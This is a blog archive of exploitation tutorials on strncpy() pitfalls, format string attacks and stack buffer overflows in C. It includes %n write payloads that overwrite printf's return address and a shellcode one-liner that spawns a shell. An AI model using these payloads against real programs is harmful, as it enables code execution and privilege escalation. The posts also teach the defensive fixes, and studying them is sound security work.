Archive for the ‘Exploitation’ Category

strncpy – Is it really secure?

Posted: September 22, 2011 in Stack Smashing

Though a lot of information is already available on this topic, I would like to talk a bit about it. Many experts consider that strncpy() just trades one type of bug for another, and in a sense this is true. The short and straightforward answer to the title is “No!”, but let’s look at why.

  • strcpy() copies data from the source to the destination until it reaches the terminating NULL character (‘\0’) of the source. It does not check the bounds of the destination, so it can be used to overflow fixed-size buffers in memory, overwriting memory locations that should never be overwritten.
  • strncpy(), on the other hand, appears to handle the problem with ease. It takes a third argument, the maximum number of characters to copy into the destination, which is generally the size of the destination buffer. But if the source string is at least that long, strncpy() does not append a NULL character to the destination (if the source is shorter, the rest of the destination is padded with NULL characters). Thus, string handling functions that later use the destination buffer have to blindly hope that the byte immediately after it is a NULL character. In most cases, it is not.

The reason is that local variables on the stack are allocated contiguously, so the byte following the buffer usually belongs to some other variable, and a function that reads past the end of the buffer simply runs into that data. A classic example is a vulnerable strcpy() call whose source string was previously copied using a (supposedly safe) strncpy() call. strcpy() copies data until it meets a NULL character, but that NULL character was never appended to the source string by the earlier strncpy() call, so strcpy() keeps copying the adjacent data as well. Thus there is a potential buffer overflow vulnerability. SmashTheStack’s IO has level6, which deals with this case specifically. I’ve also written a small writeup with hints on the same.

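Another example is a strncpy() call followed by a strncat() call, which in some cases is vulnerable to a buffer overflow: strncat()’s third argument limits the number of characters appended, not the total size of the destination, and strncat() always writes a NULL character after them. SmashTheStack’s IO has level8, which deals with this case, and I’ve also written a writeup on the same.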

Well, what do we do then?

All we can do is manually append a NULL character once the strncpy() call is done. To do this, the buffer must be one byte larger than the longest string it will hold. A secure implementation would be:

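#include <string.h>

#define STRINGSIZE 5

int main ( void ) {
    char buf [ STRINGSIZE + 1 ];           /* one extra byte for the NULL character */

    strncpy ( buf, "abcde", STRINGSIZE );
    buf [ STRINGSIZE ] = '\0';             /* strncpy() did not terminate it; we do */
    return 0;
}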

To understand this vulnerability, you first need a thorough understanding of the stack layout.

  • What is a format string?

From my (admittedly naive) understanding, a format string is a string that determines how the rest of the arguments passed to a function are formatted. In C, functions such as printf(), scanf(), fprintf() and vsprintf() take a format string as an argument.

Example: printf("%d", i);      => Here, "%d" is the format string; it tells printf() to print ‘i’ as a (decimal) integer.

  • What is a format string vulnerability?

A format string vulnerability arises when unsanitized input is passed as the format string argument of such a function. The programmer assumes this input is an ordinary string, but if it contains format directives, they are interpreted, which can be used to examine values on the stack and much more.

  • What can be done by exploiting one?

By exploiting such a vulnerability, an attacker can dump values from the program’s stack, write to arbitrary memory locations and even execute custom machine code.

Let’s take an example and proceed:

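#include <stdio.h>
#include <string.h>

int main ( int argc, char **argv ) {
    char buffer[1024];

    if ( argc >= 2 ) {
        /* Copy at most 1023 bytes and terminate the string ourselves:
           strncpy() alone does not guarantee a terminating NULL. */
        strncpy ( buffer, argv[1], sizeof ( buffer ) - 1 );
        buffer[sizeof ( buffer ) - 1] = '\0';

        /* VULNERABLE: user input is used as the format string. */
        printf ( buffer );
    }

    return 0;
}

This program should ideally print the first command line argument given to the program (at most 1023 characters of it). One question we have to ask ourselves is: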

  • Since the input given to the printf() function is unsanitized, what if we give a format string as argument?

Let’s analyze this a bit more. Let’s consider:

printf ( "%d", i );

Here, two arguments are passed to printf(). When printf() parses the first argument, it sees "%d" and concludes that a second argument, an integer, must have been provided. So it takes the next argument from the stack (the 4 bytes following the first argument, which it assumes the calling function pushed) and prints it.

Let’s take the case:

printf ( buffer );        // Here, 'buffer' contains "%d".

It’s clear from this that if ‘%d’ is present in buffer, printf tries to take the next argument from the stack. No such argument was pushed by the calling function, yet printf assumes one was, takes the next word from the stack as the integer and prints it. The value printed is whatever happens to be there (mostly a local variable of the calling function). Since we are free to put any format string we want in ‘buffer’, we have the ability to print the local variables of the calling function, and much more.

Let’s also learn about some possibilities in format strings:

  • “%p” – prints the pointer provided as argument in hexadecimal (on 32-bit x86, essentially a 4-byte hex dump).
  • “%n” – stores the number of bytes written so far into the int pointed to by the argument.
  • “%Nd” – prints the integer provided as argument, padded with leading spaces to a minimum width of N characters.

So given all this and a vulnerable printf() function:

  • We can dump values from the stack with an appropriate number of %p’s.
  • We can use ‘%n’ to write the number of bytes written so far to an address provided as argument.
  • We can use a field width (‘%Nd’) to control that count, and therefore the value written.

Coming back to our example, we know that the argument passed to printf is the starting address of the character array ‘buffer’. The memory layout is:

[Figure: Stack Layout of Format String]

Now, let’s see what we can put in ‘buffer’:

  • If ‘buffer’ = “abcd”, nothing new will happen and the function will just print ‘abcd’.
  • If ‘buffer’ = “%p”, then printf will take the next 4 bytes on the stack (part of buffer itself) as the argument and print their value in hex.
  • If ‘buffer’ = “%nAB”, then printf will treat the next argument (the first 4 bytes of ‘buffer’) as a pointer to an int and write the number of bytes printed so far (zero) to that address. This should cause a segmentation fault (SIGSEGV), because the address is 0x42416e25 (the bytes ‘%’, ‘n’, ‘A’, ‘B’ read in little-endian order) and is not accessible by this process.
  • If ‘buffer’ = “\x9c\xd8\xff\xbf%n”, then printf will treat the next argument as a pointer and write 4 into it (since \x9c\xd8\xff\xbf is 4 bytes). That argument is 0xbfffd89c, which we assume here to be the address where the return address of printf is stored. If it is not, we debug the program, find where printf’s return address is stored and use that address instead. The program will again crash with a segmentation fault: when printf returns, its return address is 0x00000004 (overwritten by printf itself), and executing instructions at that address raises SIGSEGV.
  • If ‘buffer’ =
    • “\x01\x01\x01\x01\x9c\xd8\xff\xbf”+
    • “\x01\x01\x01\x01\x9d\xd8\xff\xbf”+
    • “\x01\x01\x01\x01\x9e\xd8\xff\xbf”+
    • “\x01\x01\x01\x01\x9f\xd8\xff\xbf”+
    • “%10u%n%10u%n%10u%n%10u%n”

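In this case, assuming that the return address occupies the 4 bytes from 0xbfffd89c to 0xbfffd89f, each %10u prints one of the \x01\x01\x01\x01 words (16843009, 8 digits, padded to 10 characters) and each %n writes the running total to the next address. 32 bytes of padding words and addresses have already been printed, so printf writes 42 (0x2a) into the first byte of the return address, 52 (0x34) into the second, 62 (0x3e) into the third and 72 (0x48) into the fourth. Each %n writes a full 4-byte int, so it also spills into the following bytes, but the next write overwrites them; only the low byte of each count remains in the return address. Thus the return address of printf is overwritten as 0x483e342a. It’ll still result in a segmentation fault, but at least we now know that we can write any arbitrary value into the return address of printf.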

  • If we place some shellcode in the buffer after our format string and we know the starting address of the format string, then we can execute our own code. Let’s assume that the format string starts at address 0xbfffd8a4. The format string below is 32 + 28 = 60 bytes long, so it ends at 0xbfffd8a4 + 60 = 0xbfffd8e0, and this is where our shellcode starts. Hence, we need to write 0xbfffd8e0 as the return address of printf.
    • buffer = “\x01\x01\x01\x01\x9c\xd8\xff\xbf”+
    • “\x01\x01\x01\x01\x9d\xd8\xff\xbf”+
    • “\x01\x01\x01\x01\x9e\xd8\xff\xbf”+
    • “\x01\x01\x01\x01\x9f\xd8\xff\xbf”+
    • “%192u%n%248u%n%295u%n%192u%n”+
    • “<shellcode>”

The above payload writes the value 0xbfffd8e0 into the return address of printf, least significant byte first (x86 is little-endian). 32 bytes have already been printed before the first %u, so 32 + 192 = 224 (0xe0) is written into the first byte of the return address. Next, 224 + 248 = 472 (0x1d8), whose low byte 0xd8 goes into the second byte. Then 472 + 295 = 767 (0x2ff) puts 0xff into the third byte, and finally 767 + 192 = 959 (0x3bf) puts 0xbf into the fourth byte. Since the count can only grow, whenever the next byte is smaller than the current low byte we aim for that byte plus 0x100; the widths were also chosen to have three digits each, which keeps the format string exactly 60 bytes long.

Hence, with the above exploit, we’ll be able to execute any code we want using the format string.

How do we make our code secure?

Simple: don’t let the user pass a format string to the function. Write the format string yourself, and accept only data from the user.

printf ( buffer );              /* INSECURE */

printf ( "%s", buffer );        /* SECURE */

One of the main objectives of writing this tutorial is to show people that exploiting a buffer overflow vulnerability is NO BIG DEAL. We’re dealing with Linux here, so keep in mind that some parts of the explanation will be Linux-specific. Now, to the point.

  • What is a buffer overflow vulnerability?

A buffer overflow vulnerability is one where a program disregards bounds checking while copying data into a buffer in memory. This allows data to overflow the buffer into adjacent memory, letting a user write arbitrary data into memory locations that should not be overwritten.

  • What can be done by exploiting one?

In most cases, the user can execute arbitrary code on the host system, with the privileges of the vulnerable program. If it runs as the root user, then voila – ANYTHING is possible! 😀

  • Is there any background knowledge needed for exploitation?

A good understanding of the memory layout during program execution along with a bit of patience and self motivation is necessary to exploit one.

Now, assuming that you’ve understood the basics of stack memory layout from the background info section, let’s move on to a simple buffer overflow exploit.

Exploiting a buffer overflow

Let’s consider a sample program:

#include <stdio.h>
#include <string.h>

void print_argument ( char **argv ) {
    /* This function is vulnerable to a buffer overflow attack */
    char buffer[50];

    strcpy ( buffer, argv[1] );
    printf ( "Argument : %s\n", buffer );
    return;
}

int main ( int argc, char **argv ) {
    if ( argc >= 2 ) {
        print_argument ( argv );
    }
    return 0;
}

The above program prints the first command line argument provided to the program. Let’s examine why this program is vulnerable to a buffer overflow attack. A critical question that should be answered is:

  • What if we provide a command line argument whose length is greater than 50?

We know that the 50-byte variable buffer is allocated on the stack. Below it lies the saved base pointer (EBP), and below that lies the return address of print_argument(), which points back into main(). The outline of the stack layout is given below:

[Figure: Stack Layout]

Now, if we provide more than 50 bytes as the command line argument, strcpy() copies all of argv[1] into buffer, overflowing the buffer and overwriting the saved base pointer and the return address. On a 32-bit x86 system, the word size is 4 bytes. Hence, if we provide 58 bytes (50 + 4 + 4), we’ll overwrite both the saved base pointer and the return address, assuming the compiler adds no padding after buffer (in practice it often does, so check the real offset in a debugger).

When print_argument() returns, it pops the saved base pointer (now a value we overwrote) into EBP and the return address into EIP. The return address has also been overwritten by us, so we control where the processor executes the next instruction. Now, if we store some shellcode (machine code, which I’ll explain later) in the buffer and overwrite the return address with the starting address of buffer, the processor will start executing the buffer as if it were instructions. VOILA, we can execute whatever we want! 😀

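Now, let’s write an exploit that gives us a shell when we execute this program. Don’t worry if you don’t understand the exploit; there’s a lot to learn about shellcode and how it works before you can actually write one. In this case, let’s assume that the variable ‘buffer’ starts at address 0xbfffd89c. (On modern systems this only works with protections such as ASLR, gcc’s stack protector and the non-executable stack disabled; the latter two can be turned off with gcc’s -fno-stack-protector and -z execstack options.)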

$ gcc printargs.c -o printargs

$ ./printargs `python -c 'print "\x90"*10 + "\x6a\x31\x66\x58\xcd\x80\x66\x89" + "\xc3\x66\x89\xc1\x6a\x46\x66\x58" + "\xcd\x80\x31\xc9\xf7\xe1\x51\x68" + "\x2f\x2f\x73\x68\x68\x2f\x62\x69" + "\x6e\x89\xe3\xb0\x0b\xcd\x80" + "\x41"*5 + "\x9c\xd8\xff\xbf"'`

sh:~$

That’s it, you’ve got a shell! 🙂 It’s as simple as that, folks, nothing more to it! 😀